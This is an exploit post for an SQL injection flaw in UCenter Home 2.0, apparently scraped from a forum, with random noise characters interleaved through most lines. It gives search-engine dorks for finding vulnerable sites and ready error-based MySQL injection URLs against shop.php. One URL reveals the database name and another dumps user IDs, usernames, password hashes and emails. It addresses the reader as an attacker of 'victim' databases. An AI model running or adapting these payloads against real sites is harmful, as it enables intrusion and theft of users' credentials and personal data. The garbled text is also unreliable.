1 ~. f6 M1 {7 u2 w# [
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ : I- u0 U# W/ G7 C3 t. q: r
- w( ?5 C( k9 M; u
3 D ~1 h% { u# s% h
, g. r2 r2 J* g$ s- B' E# T
*/ Author : KnocKout
8 a' V$ x. t; R. z" f, R' ?! m" m3 O- z' m
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
1 i- x1 N2 f& C* A6 r9 m. a$ n+ W4 N
3 O" ?$ {; s$ g; @*/ Contact: knockoutr@msn.com
7 s! u) P; [: Y9 [1 s5 Q0 F% B7 F3 [
*/ Cyber-Warrior.org/CWKnocKout
( E# V' c4 G2 U
/ G; F: F3 g. P5 V- c7 X' h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * D' E* t. J; B- B$ c8 Q0 q
: m# }& ?1 v" l4 h# D" ~$ oScript : UCenter Home * G' T8 |: D" M1 Z- Z6 u
) l. Z1 i4 a3 Q* T% @3 l
Version : 2.0
7 K9 y5 W! R3 e* s
; W [- |% y F) QScript HomePage : http://u.discuz.net/
6 D. L" d5 t! _( `9 T5 r; q4 |. A8 ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 K" D8 h* ~* q$ D/ b# G* E2 ^/ i) f9 p* T
Dork : Powered by UCenter inurl:shop.php?ac=view , G6 f+ e, I" W
( j1 P3 e1 A1 RDork 2 : inurl:shop.php?ac=view&shopid=
8 K5 H9 I7 D6 z) w
9 o8 e K) E/ n6 n__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
. Q# u. }, G, k4 ]6 a/ H( X5 Z# n8 J d- b. \, d$ E2 @% I
Vuln file : Shop.php 2 b8 M( u! M1 s2 b, H' ^; F; {/ ?! k
4 r8 l/ H: ^0 G$ o( b
value's : (?)ac=view&shopid=
# A& n: u5 Z9 {. N0 P
! C2 D1 ?: P, G, t' k6 z8 C& r2 LVulnerable Style : SQL Injection (MySQL Error Based) 4 y* y; N4 V1 B
5 t8 @5 c# p! N3 W% {7 \
Need Metarials : Hex Conversion 3 A/ @0 s3 E3 y4 y0 n
6 _* f/ ~: K0 c0 F- X__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
, J( L$ r! e' G! U K" D9 p* T: `
+ U; @: h9 Z& `5 PYour Need victim Database name. 2 Q' E) Q) A; z8 f6 {2 ^
2 R: L6 n, u: X% }7 ^* z
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
! f& R, o' D6 g7 Y d" x4 I3 x; G8 b
) q' R! t9 ~6 A( t6 o..
' C) @7 R+ E5 {7 p% X
8 G# W/ A: r9 T' x: T* A, n3 M- nDB : Okey.
, {/ g! q: i+ p" z) F" X% l/ L) ]- x, R1 Y7 _7 i
your edit DB `[TARGET DB NAME]` ) b% M7 l4 v! P
) e- y' F1 O/ F3 e- S/ N( Q) N. ^
Example : 'hiwir1_ucenter' $ e5 ?& T. \9 ^
$ i& `$ C8 B9 g& {1 \9 gEdit : Okey.
4 a) z9 \* {# U. |9 v' x' A/ F0 o: L6 j$ h
Your use Hex conversion. And edit Your SQL Injection Exploit..
2 u: s7 @. o7 H# r, \
7 e( F8 A# R0 c, c8 V
" V8 N. Q- W& W+ o/ C# Y7 K7 G+ Q3 ?7 s: c, Q
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* N4 r: K" ]- X( n/ h. v1 S3 h$ ` |